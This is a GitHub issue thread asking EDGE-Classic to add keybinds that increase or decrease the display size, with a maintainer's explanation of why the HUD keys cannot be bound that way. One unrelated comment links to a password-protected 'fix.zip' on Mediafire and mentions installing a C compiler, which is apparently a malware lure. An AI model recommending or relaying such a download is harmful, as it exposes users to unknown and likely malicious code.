### ISSUE TITLE
[feature request] binds to increase / decrease the display size

### ISSUE THREAD

**Issue by Sol1vaN** [edge-classic/EDGE-classic#737]
responding from:
https://forum.zdoom.org/viewtopic.php?p=1255352#p1255352

your question:
"-I'm not sure what "increase/raise the HUD" actually refers to in this context; would you be able to explain?"

on Nugget Doom/dsda doom the binds are called
"Larger vyiew"
"Smaller view"

on GZDoom the binds are called:
"Increase display size"
"Decrease display size"

Resuming:
on vanilla doom, this keys -    =  are used to increase/decrease the display size and to hide the HUD.
Actually this action is only for change the HUD appareance, switching to:
-standard hud
-full screen hud
-nugget type hud (nugget specific)
-boom no bars  (nugget specific)
-alternative hud (gzdoom por specific)
-and so on...

Can be added this binds on a future release? 
cheers.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by Sol1vaN** [comment]
> maybe this will help https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme
> you may need to install the c compiler

what do this? 😯

**Comment by dashodanger** [comment]
Since the HUDs are entirely driven by Lua and/or COAL, the only thing that the - and = keys accomplish in EDGE-Classic is cycling an internal variable called `which_hud`. In the stock LUAHUDS that we ship, cycling through different `which_hud` values cycle from one of two traditional status bar layouts, a third minimal HUD, and a completely HUDless option. PWADs or other files in the load order may do something completely different with `which_hud` and as such we cannot bind them to perform specific actions that manipulate the HUD itself.

**Comment by Sol1vaN** [comment]
i understand, and so unfortunated about that.
anyway, thanks for the reply..
